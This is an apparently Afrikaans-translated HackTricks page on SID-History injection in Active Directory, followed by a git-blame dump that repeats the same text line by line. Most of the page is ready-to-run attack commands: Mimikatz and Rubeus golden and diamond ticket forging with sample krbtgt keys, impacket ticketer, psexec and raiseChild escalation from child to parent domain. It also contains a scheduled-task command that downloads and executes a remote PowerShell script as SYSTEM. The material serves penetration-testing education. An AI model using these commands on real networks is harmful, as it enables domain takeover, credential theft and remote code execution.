hacktricks/windows-hardening/active-directory-methodology/sid-history-injection.md

# SID-History Injeksie

<details>

<summary><strong>Leer AWS-hacking van nul tot held met</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>

* Werk jy in 'n **cybersecurity-maatskappy**? Wil jy jou **maatskappy adverteer in HackTricks**? Of wil jy toegang hê tot die **nuutste weergawe van die PEASS of laai HackTricks af in PDF-formaat**? Kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFT's**](https://opensea.io/collection/the-peass-family)
* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com)
* **Sluit aan by die** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** my op **Twitter** 🐦[**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
* **Deel jou hacking-truuks deur PR's in te dien by die [hacktricks repo](https://github.com/carlospolop/hacktricks) en [hacktricks-cloud repo](https://github.com/carlospolop/hacktricks-cloud)**.

</details>

## SID Geskiedenis Injeksie Aanval

Die fokus van die **SID Geskiedenis Injeksie Aanval** is om **gebruikerverskuiwing tussen domeine** te ondersteun terwyl voortgesette toegang tot hulpbronne van die vorige domein verseker word. Dit word bereik deur die **vorige Sekuriteitsidentifiseerder (SID) van die gebruiker in die SID-geskiedenis** van hul nuwe rekening in te sluit. Dit kan egter misbruik word om ongemagtigde toegang te verleen deur die SID van 'n hoë-voorregtegroep (soos Enterprise Admins of Domain Admins) van die ouer domein by die SID-geskiedenis te voeg. Hierdie uitbuiting verleen toegang tot alle hulpbronne binne die ouer domein.

Daar bestaan twee metodes om hierdie aanval uit te voer: deur die skepping van 'n **Golden Ticket** of 'n **Diamond Ticket**.

Om die SID vir die **"Enterprise Admins"**-groep te vind, moet jy eers die SID van die hoofdomein opspoor. Nadat die identifikasie voltooi is, kan die SID van die Enterprise Admins-groep gekonstrueer word deur `-519` aan die SID van die hoofdomein toe te voeg. Byvoorbeeld, as die SID van die hoofdomein `S-1-5-21-280534878-1496970234-700767426` is, sal die resulterende SID vir die "Enterprise Admins" groep `S-1-5-21-280534878-1496970234-700767426-519` wees.

Jy kan ook die **Domain Admins**-groepe gebruik, wat eindig in **512**.

'n Ander manier om die SID van 'n groep van die ander domein (byvoorbeeld "Domain Admins") te vind, is met:
```powershell
Get-DomainGroup -Identity "Domain Admins" -Domain parent.io -Properties ObjectSid
```
### Goue Kaartjie (Mimikatz) met KRBTGT-AES256

{% code overflow="wrap" %}
```bash
mimikatz.exe "kerberos::golden /user:Administrator /domain:<current_domain> /sid:<current_domain_sid> /sids:<victim_domain_sid_of_group> /aes256:<krbtgt_aes256> /startoffset:-10 /endin:600 /renewmax:10080 /ticket:ticket.kirbi" "exit"

/user is the username to impersonate (could be anything)
/domain is the current domain.
/sid is the current domain SID.
/sids is the SID of the target group to add ourselves to.
/aes256 is the AES256 key of the current domain's krbtgt account.
--> You could also use /krbtgt:<HTML of krbtgt> instead of the "/aes256" option
/startoffset sets the start time of the ticket to 10 mins before the current time.
/endin sets the expiry date for the ticket to 60 mins.
/renewmax sets how long the ticket can be valid for if renewed.

# The previous command will generate a file called ticket.kirbi
# Just loading you can perform a dcsync attack agains the domain
```
{% endcode %}

Vir meer inligting oor goue kaartjies, kyk:

{% content-ref url="golden-ticket.md" %}
[golden-ticket.md](golden-ticket.md)
{% endcontent-ref %}

### Diamantkaartjie (Rubeus + KRBTGT-AES256)

{% code overflow="wrap" %}
```powershell
# Use the /sids param
Rubeus.exe diamond /tgtdeleg /ticketuser:Administrator /ticketuserid:500 /groups:512 /sids:S-1-5-21-378720957-2217973887-3501892633-512 /krbkey:390b2fdb13cc820d73ecf2dadddd4c9d76425d4c2156b89ac551efb9d591a8aa /nowrap

# Or a ptt with a golden ticket
Rubeus.exe golden /rc4:<krbtgt hash> /domain:<child_domain> /sid:<child_domain_sid>  /sids:<parent_domain_sid>-519 /user:Administrator /ptt

# You can use "Administrator" as username or any other string
```
{% endcode %}

Vir meer inligting oor diamantkaartjies, kyk:

{% content-ref url="diamond-ticket.md" %}
[diamond-ticket.md](diamond-ticket.md)
{% endcontent-ref %}

{% code overflow="wrap" %}
```bash
.\asktgs.exe C:\AD\Tools\kekeo_old\trust_tkt.kirbi CIFS/mcorp-dc.moneycorp.local
.\kirbikator.exe lsa .\CIFS.mcorpdc.moneycorp.local.kirbi
ls \\mcorp-dc.moneycorp.local\c$
```
{% endcode %}

Skalasieer na DA of root of Enterprise-admin deur die KRBTGT-hash van die gekompromitteerde domein te gebruik:

{% code overflow="wrap" %}
```bash
Invoke-Mimikatz -Command '"kerberos::golden /user:Administrator /domain:dollarcorp.moneycorp.local /sid:S-1-5-211874506631-3219952063-538504511 /sids:S-1-5-21-280534878-1496970234700767426-519 /krbtgt:ff46a9d8bd66c6efd77603da26796f35 /ticket:C:\AD\Tools\krbtgt_tkt.kirbi"'

Invoke-Mimikatz -Command '"kerberos::ptt C:\AD\Tools\krbtgt_tkt.kirbi"'

gwmi -class win32_operatingsystem -ComputerName mcorpdc.moneycorp.local

schtasks /create /S mcorp-dc.moneycorp.local /SC Weekely /RU "NT Authority\SYSTEM" /TN "STCheck114" /TR "powershell.exe -c 'iex (New-Object Net.WebClient).DownloadString(''http://172.16.100.114:8080/pc.ps1''')'"

schtasks /Run /S mcorp-dc.moneycorp.local /TN "STCheck114"
```
{% endcode %}

Met die verkryging van die toestemmings van die aanval kan jy byvoorbeeld 'n DCSync-aanval in die nuwe domein uitvoer:

{% content-ref url="dcsync.md" %}
[dcsync.md](dcsync.md)
{% endcontent-ref %}

### Vanaf Linux

#### Handleiding met [ticketer.py](https://github.com/SecureAuthCorp/impacket/blob/master/examples/ticketer.py)

{% code overflow="wrap" %}
```bash
# This is for an attack from child to root domain
# Get child domain SID
lookupsid.py <child_domain>/username@10.10.10.10 | grep "Domain SID"
# Get root domain SID
lookupsid.py <child_domain>/username@10.10.10.10 | grep -B20 "Enterprise Admins" | grep "Domain SID"

# Generate golden ticket
ticketer.py -nthash <krbtgt_hash> -domain <child_domain> -domain-sid <child_domain_sid> -extra-sid <root_domain_sid> Administrator

# NOTE THAT THE USERNAME ADMINISTRATOR COULD BE ACTUALLY ANYTHING
# JUST USE THE SAME USERNAME IN THE NEXT STEPS

# Load ticket
export KRB5CCNAME=hacker.ccache

# psexec in domain controller of root
psexec.py <child_domain>/Administrator@dc.root.local -k -no-pass -target-ip 10.10.10.10
```
{% endcode %}

#### Outomaties met behulp van [raiseChild.py](https://github.com/SecureAuthCorp/impacket/blob/master/examples/raiseChild.py)

Dit is 'n Impacket-skripsie wat sal outomatiseer om van kind na ouer domein te eskaleer. Die skripsie benodig:

* Teikendomeinbeheerder
* Gelde vir 'n administrateurgebruiker in die kinddomein

Die stroom is as volg:

* Verkry die SID vir die Enterprise Admins-groep van die ouer domein
* Haal die has vir die KRBTGT-rekening in die kinddomein op
* Skep 'n Golden Ticket
* Teken in by die ouer domein
* Haal gelde vir die Administrateur-rekening in die ouer domein op
* As die `target-exec`-skakelaar gespesifiseer word, verifieer dit na die ouer domein se domeinbeheerder via Psexec.
```bash
raiseChild.py -target-exec 10.10.10.10 <child_domain>/username
```
## Verwysings
* [https://adsecurity.org/?p=1772](https://adsecurity.org/?p=1772)
* [https://www.sentinelone.com/blog/windows-sid-history-injection-exposure-blog/](https://www.sentinelone.com/blog/windows-sid-history-injection-exposure-blog/)

<details>

<summary><strong>Leer AWS-hacking van nul tot held met</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>

* Werk jy in 'n **cybersecurity-maatskappy**? Wil jy jou **maatskappy adverteer in HackTricks**? Of wil jy toegang hê tot die **nuutste weergawe van die PEASS of laai HackTricks in PDF af**? Kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family)
* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com)
* **Sluit aan by die** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** my op **Twitter** 🐦[**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
* **Deel jou hacking-truuks deur PR's in te dien by die [hacktricks repo](https://github.com/carlospolop/hacktricks) en [hacktricks-cloud repo](https://github.com/carlospolop/hacktricks-cloud)**.

</details>
Translated to Afrikaans 2024-02-11 02:07:06 +00:00			`# SID-History Injeksie`
GitBook: [#3391] No subject 2022-08-15 21:10:48 +00:00
			`<details>`

Translated to Afrikaans 2024-02-11 02:07:06 +00:00			`<summary><strong>Leer AWS-hacking van nul tot held met</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>`
GitBook: [#3391] No subject 2022-08-15 21:10:48 +00:00
Translated to Afrikaans 2024-02-11 02:07:06 +00:00			`* Werk jy in 'n cybersecurity-maatskappy? Wil jy jou maatskappy adverteer in HackTricks? Of wil jy toegang hê tot die nuutste weergawe van die PEASS of laai HackTricks af in PDF-formaat? Kyk na die [SUBSCRIPTION PLANS](https://github.com/sponsors/carlospolop)!`
			`* Ontdek [The PEASS Family](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [NFT's](https://opensea.io/collection/the-peass-family)`
			`* Kry die [amptelike PEASS & HackTricks swag](https://peass.creator-spring.com)`
			`* Sluit aan by die [💬](https://emojipedia.org/speech-balloon/) [Discord-groep](https://discord.gg/hRep4RUj7f) of die [telegram-groep](https://t.me/peass) of volg my op Twitter 🐦[@carlospolopm](https://twitter.com/hacktricks_live).`
			`* Deel jou hacking-truuks deur PR's in te dien by die [hacktricks repo](https://github.com/carlospolop/hacktricks) en [hacktricks-cloud repo](https://github.com/carlospolop/hacktricks-cloud).`
GitBook: [#3391] No subject 2022-08-15 21:10:48 +00:00
			`</details>`

Translated to Afrikaans 2024-02-11 02:07:06 +00:00			`## SID Geskiedenis Injeksie Aanval`
GitBook: [#3455] No subject 2022-09-04 09:37:14 +00:00
Translated to Afrikaans 2024-02-11 02:07:06 +00:00			Die fokus van die SID Geskiedenis Injeksie Aanval is om gebruikerverskuiwing tussen domeine te ondersteun terwyl voortgesette toegang tot hulpbronne van die vorige domein verseker word. Dit word bereik deur die vorige Sekuriteitsidentifiseerder (SID) van die gebruiker in die SID-geskiedenis van hul nuwe rekening in te sluit. Dit kan egter misbruik word om ongemagtigde toegang te verleen deur die SID van 'n hoë-voorregtegroep (soos Enterprise Admins of Domain Admins) van die ouer domein by die SID-geskiedenis te voeg. Hierdie uitbuiting verleen toegang tot alle hulpbronne binne die ouer domein.
GitBook: [#3391] No subject 2022-08-15 21:10:48 +00:00
Translated to Afrikaans 2024-02-11 02:07:06 +00:00			`Daar bestaan twee metodes om hierdie aanval uit te voer: deur die skepping van 'n Golden Ticket of 'n Diamond Ticket.`
GitBook: [#3391] No subject 2022-08-15 21:10:48 +00:00
Translated to Afrikaans 2024-02-11 02:07:06 +00:00			Om die SID vir die "Enterprise Admins"-groep te vind, moet jy eers die SID van die hoofdomein opspoor. Nadat die identifikasie voltooi is, kan die SID van die Enterprise Admins-groep gekonstrueer word deur `-519` aan die SID van die hoofdomein toe te voeg. Byvoorbeeld, as die SID van die hoofdomein `S-1-5-21-280534878-1496970234-700767426` is, sal die resulterende SID vir die "Enterprise Admins" groep `S-1-5-21-280534878-1496970234-700767426-519` wees.
GitBook: [#3455] No subject 2022-09-04 09:37:14 +00:00
Translated to Afrikaans 2024-02-11 02:07:06 +00:00			`Jy kan ook die Domain Admins-groepe gebruik, wat eindig in 512.`
GitBook: [#3391] No subject 2022-08-15 21:10:48 +00:00
Translated to Afrikaans 2024-02-11 02:07:06 +00:00			`'n Ander manier om die SID van 'n groep van die ander domein (byvoorbeeld "Domain Admins") te vind, is met:`
GitBook: [#3391] No subject 2022-08-15 21:10:48 +00:00			```powershell
			`Get-DomainGroup -Identity "Domain Admins" -Domain parent.io -Properties ObjectSid`
			```
Translated to Afrikaans 2024-02-11 02:07:06 +00:00			`### Goue Kaartjie (Mimikatz) met KRBTGT-AES256`
GitBook: [#3391] No subject 2022-08-15 21:10:48 +00:00
GitBook: [#3573] No subject 2022-10-06 09:16:41 +00:00			`{% code overflow="wrap" %}`
GitBook: [#3455] No subject 2022-09-04 09:37:14 +00:00			```bash
			`mimikatz.exe "kerberos::golden /user:Administrator /domain:<current_domain> /sid:<current_domain_sid> /sids:<victim_domain_sid_of_group> /aes256:<krbtgt_aes256> /startoffset:-10 /endin:600 /renewmax:10080 /ticket:ticket.kirbi" "exit"`

GitBook: [#3573] No subject 2022-10-06 09:16:41 +00:00			`/user is the username to impersonate (could be anything)`
GitBook: [#3455] No subject 2022-09-04 09:37:14 +00:00			`/domain is the current domain.`
			`/sid is the current domain SID.`
			`/sids is the SID of the target group to add ourselves to.`
			`/aes256 is the AES256 key of the current domain's krbtgt account.`
GitBook: [#3573] No subject 2022-10-06 09:16:41 +00:00			`--> You could also use /krbtgt:<HTML of krbtgt> instead of the "/aes256" option`
GitBook: [#3455] No subject 2022-09-04 09:37:14 +00:00			`/startoffset sets the start time of the ticket to 10 mins before the current time.`
			`/endin sets the expiry date for the ticket to 60 mins.`
			`/renewmax sets how long the ticket can be valid for if renewed.`

			`# The previous command will generate a file called ticket.kirbi`
			`# Just loading you can perform a dcsync attack agains the domain`
GitBook: [#3391] No subject 2022-08-15 21:10:48 +00:00			```
GitBook: [#3573] No subject 2022-10-06 09:16:41 +00:00			`{% endcode %}`
GitBook: [#3391] No subject 2022-08-15 21:10:48 +00:00
Translated to Afrikaans 2024-02-11 02:07:06 +00:00			`Vir meer inligting oor goue kaartjies, kyk:`
GitBook: [#3391] No subject 2022-08-15 21:10:48 +00:00
			`{% content-ref url="golden-ticket.md" %}`
			`[golden-ticket.md](golden-ticket.md)`
			`{% endcontent-ref %}`

Translated to Afrikaans 2024-02-11 02:07:06 +00:00			`### Diamantkaartjie (Rubeus + KRBTGT-AES256)`
GitBook: [#3391] No subject 2022-08-15 21:10:48 +00:00
GitBook: [#3573] No subject 2022-10-06 09:16:41 +00:00			`{% code overflow="wrap" %}`
GitBook: [#3391] No subject 2022-08-15 21:10:48 +00:00			```powershell
			`# Use the /sids param`
			`Rubeus.exe diamond /tgtdeleg /ticketuser:Administrator /ticketuserid:500 /groups:512 /sids:S-1-5-21-378720957-2217973887-3501892633-512 /krbkey:390b2fdb13cc820d73ecf2dadddd4c9d76425d4c2156b89ac551efb9d591a8aa /nowrap`
GitBook: [#3573] No subject 2022-10-06 09:16:41 +00:00
			`# Or a ptt with a golden ticket`
			`Rubeus.exe golden /rc4:<krbtgt hash> /domain:<child_domain> /sid:<child_domain_sid> /sids:<parent_domain_sid>-519 /user:Administrator /ptt`

			`# You can use "Administrator" as username or any other string`
GitBook: [#3391] No subject 2022-08-15 21:10:48 +00:00			```
GitBook: [#3573] No subject 2022-10-06 09:16:41 +00:00			`{% endcode %}`
GitBook: [#3391] No subject 2022-08-15 21:10:48 +00:00
Translated to Afrikaans 2024-02-11 02:07:06 +00:00			`Vir meer inligting oor diamantkaartjies, kyk:`
GitBook: [#3391] No subject 2022-08-15 21:10:48 +00:00
			`{% content-ref url="diamond-ticket.md" %}`
			`[diamond-ticket.md](diamond-ticket.md)`
			`{% endcontent-ref %}`

GitBook: [#3573] No subject 2022-10-06 09:16:41 +00:00			`{% code overflow="wrap" %}`
GitBook: [#3391] No subject 2022-08-15 21:10:48 +00:00			```bash
Translated to Afrikaans 2024-02-11 02:07:06 +00:00			`.\asktgs.exe C:\AD\Tools\kekeo_old\trust_tkt.kirbi CIFS/mcorp-dc.moneycorp.local`
GitBook: [#3391] No subject 2022-08-15 21:10:48 +00:00			`.\kirbikator.exe lsa .\CIFS.mcorpdc.moneycorp.local.kirbi`
			`ls \\mcorp-dc.moneycorp.local\c$`
			```
GitBook: [#3573] No subject 2022-10-06 09:16:41 +00:00			`{% endcode %}`
GitBook: [#3391] No subject 2022-08-15 21:10:48 +00:00
Translated to Afrikaans 2024-02-11 02:07:06 +00:00			`Skalasieer na DA of root of Enterprise-admin deur die KRBTGT-hash van die gekompromitteerde domein te gebruik:`
GitBook: [#3391] No subject 2022-08-15 21:10:48 +00:00
GitBook: [#3573] No subject 2022-10-06 09:16:41 +00:00			`{% code overflow="wrap" %}`
GitBook: [#3391] No subject 2022-08-15 21:10:48 +00:00			```bash
			`Invoke-Mimikatz -Command '"kerberos::golden /user:Administrator /domain:dollarcorp.moneycorp.local /sid:S-1-5-211874506631-3219952063-538504511 /sids:S-1-5-21-280534878-1496970234700767426-519 /krbtgt:ff46a9d8bd66c6efd77603da26796f35 /ticket:C:\AD\Tools\krbtgt_tkt.kirbi"'`
GitBook: [#3573] No subject 2022-10-06 09:16:41 +00:00
GitBook: [#3391] No subject 2022-08-15 21:10:48 +00:00			`Invoke-Mimikatz -Command '"kerberos::ptt C:\AD\Tools\krbtgt_tkt.kirbi"'`
GitBook: [#3573] No subject 2022-10-06 09:16:41 +00:00
GitBook: [#3391] No subject 2022-08-15 21:10:48 +00:00			`gwmi -class win32_operatingsystem -ComputerName mcorpdc.moneycorp.local`
GitBook: [#3573] No subject 2022-10-06 09:16:41 +00:00
GitBook: [#3391] No subject 2022-08-15 21:10:48 +00:00			`schtasks /create /S mcorp-dc.moneycorp.local /SC Weekely /RU "NT Authority\SYSTEM" /TN "STCheck114" /TR "powershell.exe -c 'iex (New-Object Net.WebClient).DownloadString(''http://172.16.100.114:8080/pc.ps1''')'"`
GitBook: [#3573] No subject 2022-10-06 09:16:41 +00:00
GitBook: [#3391] No subject 2022-08-15 21:10:48 +00:00			`schtasks /Run /S mcorp-dc.moneycorp.local /TN "STCheck114"`
			```
GitBook: [#3573] No subject 2022-10-06 09:16:41 +00:00			`{% endcode %}`

Translated to Afrikaans 2024-02-11 02:07:06 +00:00			`Met die verkryging van die toestemmings van die aanval kan jy byvoorbeeld 'n DCSync-aanval in die nuwe domein uitvoer:`
GitBook: [#3573] No subject 2022-10-06 09:16:41 +00:00
			`{% content-ref url="dcsync.md" %}`
			`[dcsync.md](dcsync.md)`
			`{% endcontent-ref %}`

Translated to Afrikaans 2024-02-11 02:07:06 +00:00			`### Vanaf Linux`
GitBook: [#3573] No subject 2022-10-06 09:16:41 +00:00
Translated to Afrikaans 2024-02-11 02:07:06 +00:00			`#### Handleiding met [ticketer.py](https://github.com/SecureAuthCorp/impacket/blob/master/examples/ticketer.py)`
GitBook: [#3573] No subject 2022-10-06 09:16:41 +00:00
			`{% code overflow="wrap" %}`
			```bash
			`# This is for an attack from child to root domain`
			`# Get child domain SID`
			`lookupsid.py <child_domain>/username@10.10.10.10 \| grep "Domain SID"`
			`# Get root domain SID`
			`lookupsid.py <child_domain>/username@10.10.10.10 \| grep -B20 "Enterprise Admins" \| grep "Domain SID"`

			`# Generate golden ticket`
			`ticketer.py -nthash <krbtgt_hash> -domain <child_domain> -domain-sid <child_domain_sid> -extra-sid <root_domain_sid> Administrator`

			`# NOTE THAT THE USERNAME ADMINISTRATOR COULD BE ACTUALLY ANYTHING`
			`# JUST USE THE SAME USERNAME IN THE NEXT STEPS`

			`# Load ticket`
Translated to Afrikaans 2024-02-11 02:07:06 +00:00			`export KRB5CCNAME=hacker.ccache`
GitBook: [#3573] No subject 2022-10-06 09:16:41 +00:00
			`# psexec in domain controller of root`
			`psexec.py <child_domain>/Administrator@dc.root.local -k -no-pass -target-ip 10.10.10.10`
			```
			`{% endcode %}`

Translated to Afrikaans 2024-02-11 02:07:06 +00:00			`#### Outomaties met behulp van [raiseChild.py](https://github.com/SecureAuthCorp/impacket/blob/master/examples/raiseChild.py)`
GitBook: [#3573] No subject 2022-10-06 09:16:41 +00:00
Translated to Afrikaans 2024-02-11 02:07:06 +00:00			`Dit is 'n Impacket-skripsie wat sal outomatiseer om van kind na ouer domein te eskaleer. Die skripsie benodig:`
GitBook: [#3573] No subject 2022-10-06 09:16:41 +00:00
Translated to Afrikaans 2024-02-11 02:07:06 +00:00			`* Teikendomeinbeheerder`
			`* Gelde vir 'n administrateurgebruiker in die kinddomein`
GitBook: [#3573] No subject 2022-10-06 09:16:41 +00:00
Translated to Afrikaans 2024-02-11 02:07:06 +00:00			`Die stroom is as volg:`
GitBook: [#3573] No subject 2022-10-06 09:16:41 +00:00
Translated to Afrikaans 2024-02-11 02:07:06 +00:00			`* Verkry die SID vir die Enterprise Admins-groep van die ouer domein`
			`* Haal die has vir die KRBTGT-rekening in die kinddomein op`
			`* Skep 'n Golden Ticket`
			`* Teken in by die ouer domein`
			`* Haal gelde vir die Administrateur-rekening in die ouer domein op`
			* As die `target-exec`-skakelaar gespesifiseer word, verifieer dit na die ouer domein se domeinbeheerder via Psexec.
GitBook: [#3573] No subject 2022-10-06 09:16:41 +00:00			```bash
			`raiseChild.py -target-exec 10.10.10.10 <child_domain>/username`
			```
Translated to Afrikaans 2024-02-11 02:07:06 +00:00			`## Verwysings`
a 2024-02-08 03:06:37 +00:00			`* [https://adsecurity.org/?p=1772](https://adsecurity.org/?p=1772)`
			`* [https://www.sentinelone.com/blog/windows-sid-history-injection-exposure-blog/](https://www.sentinelone.com/blog/windows-sid-history-injection-exposure-blog/)`
GitBook: [#3391] No subject 2022-08-15 21:10:48 +00:00
GitBook: [#3555] No subject 2022-10-04 14:21:27 +00:00			`<details>`
GitBook: [#3391] No subject 2022-08-15 21:10:48 +00:00
Translated to Afrikaans 2024-02-11 02:07:06 +00:00			`<summary><strong>Leer AWS-hacking van nul tot held met</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>`
GitBook: [#3391] No subject 2022-08-15 21:10:48 +00:00
Translated to Afrikaans 2024-02-11 02:07:06 +00:00			`* Werk jy in 'n cybersecurity-maatskappy? Wil jy jou maatskappy adverteer in HackTricks? Of wil jy toegang hê tot die nuutste weergawe van die PEASS of laai HackTricks in PDF af? Kyk na die [SUBSCRIPTION PLANS](https://github.com/sponsors/carlospolop)!`
			`* Ontdek [The PEASS Family](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [NFTs](https://opensea.io/collection/the-peass-family)`
			`* Kry die [amptelike PEASS & HackTricks swag](https://peass.creator-spring.com)`
			`* Sluit aan by die [💬](https://emojipedia.org/speech-balloon/) [Discord-groep](https://discord.gg/hRep4RUj7f) of die [telegram-groep](https://t.me/peass) of volg my op Twitter 🐦[@carlospolopm](https://twitter.com/hacktricks_live).`
			`* Deel jou hacking-truuks deur PR's in te dien by die [hacktricks repo](https://github.com/carlospolop/hacktricks) en [hacktricks-cloud repo](https://github.com/carlospolop/hacktricks-cloud).`
GitBook: [#3391] No subject 2022-08-15 21:10:48 +00:00
			`</details>`